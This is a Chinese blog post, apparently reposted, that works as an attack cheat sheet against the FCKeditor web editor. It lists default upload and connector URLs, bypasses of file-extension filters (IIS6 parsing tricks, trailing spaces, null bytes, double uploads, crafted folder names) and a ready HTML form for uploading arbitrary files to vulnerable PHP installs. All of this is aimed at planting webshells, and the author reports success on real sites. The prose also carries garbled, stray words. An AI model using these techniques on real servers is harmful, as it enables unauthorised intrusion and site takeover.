目录php
FCKeditorhtml
asp网页python
aspx网页linux
php网页shell
jsp网页 编程
FCKeditor
FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,能够为用户提供微软office软件同样的在线文档编辑服务。它不须要安装任何形式的客户端,兼容绝大多数主流浏览器,支持ASP.Net、ASP、ColdFusion 、PHP、Java、Active-FoxPro、Lasso、Perl、python 等编程环境。windows
查看编辑器版本:浏览器
/fckeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html
一些FCK默认连接(以asp为例):服务器
上传测试页面:Fckeditor编辑器默认会存在test.html和uploadtest.html文件,直接访问这些文件能够获取当前文件夹文件名称以及上传文件,有的版本能够直接上传任意文件类型,测试上传地址有: FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html 示例页面: FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp 链接器: FCKeditor/editor/filemanager/connectors/asp/connector.asp FCKeditor/editor/filemanager/connectors/aspx/connector.aspx 建立文件夹连接: FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=test 上传页面: Fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp Fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=/&Connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp 有时候,网站管理员会把上传页面禁止建立文件夹和上传文件,可是因为网站管理员的配置不当,咱们的链接器写绝对路径的话,有时候能够建立文件夹和上传文件 Fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=http://ww.xxx.com/connectors/asp/connector.Asp Fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://ww.xxx.com/connectors/asp/connector.asp Fckeditor/editor/filemanager/browser/default/browser.html?Type=Flash&Connector=http://ww.xxx.com/connectors/asp/connector.asp
FCKeditor 文件上传“.”变“_”下划线的绕过方法jsp
不少时候上传的文件例如: 或shell.asp;.jpg 会变为shell_asp;.jpg 这是新版FCK 的变化。
- 继续上传同名文件可变为shell.php;(1).jpg ,可是新版Fckeditor也修复了这个漏洞。
若是服务器有解析漏洞的话,能够建立文件夹来突破
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
asp网页
asp通常是搭在Windows Server主机上,Web Server版本通常为 IIS6 / IIS7 / IIS7.5。据我如今所知,asp版的fckeditor已经能够全秒了。
< 2.4.x 版本的File参数时为黑名单验证,能够经过上传.asa、.cer、.asp;jpg(针对IIS6)。若是asa、cer不被解析,还能够传.asp[空格]。传的方法就是抓包而后在数据包里的文件名后填个空格。
对于 2.5.x 和 2.6.x 版本,若是是IIS6.0 ,能够经过突破变”.”为”_”限制建立.asp文件夹,代码以下:
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
复制代码而后往这个文件夹里传 jpg ,这个很少说了。
若是是IIS7及以上,这种方法就gg了。这个时候能够借助刚爆出来的那种方法,先传shell.asp%00txt,而后再传一次。
至此,asp版本已经全秒了。
aspx网页
低版本同ASP版,2.6.x用刚爆出来的二次上传已经很差使了,不过新建test.asp的文件夹还能够使。通常IIS6.0会支持asp,能够先传个asp上去,而后再XX。
php网页
1:低版本(2.4.x及如下),仍然为黑名单验证,windows主机能够使用php[空格]传,2.4.3的有个media未设置致使任意文件上传能够秒linux。
2:2.5.x之后是白名单验证,仅能寄但愿于wooyun里爆的那个<2.6.4的任意文件上传,成功率有限。
3:2.6.4以上的php版,据我所知没戏,求高人指点!我粗略的看了一下它的验证逻辑,表示没戏,windows里的敏感字符全给过滤了。
4:当FCKeditor 版本 <=2.4.2的php网页在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,致使用户上传任意文件!将如下保存为html文件,修改action地址为存在漏洞网页的连接。
<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form>
jsp网页
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
上传马所在目录
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
上传shell的地址
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有关系.并非百分百成功. 测试成功几个站.
不能通杀.很遗憾.
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
若是以上地址不行能够试试
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector FCKeditor/_samples/ FCKeditor/_samples/default.html FCKeditor/editor/fckeditor.htm FCKeditor/editor/fckdialog.html
转载文章:https://blog.csdn.net/wizardforcel/article/details/50695885
https://blog.csdn.net/lizhengnanhua/article/details/38451737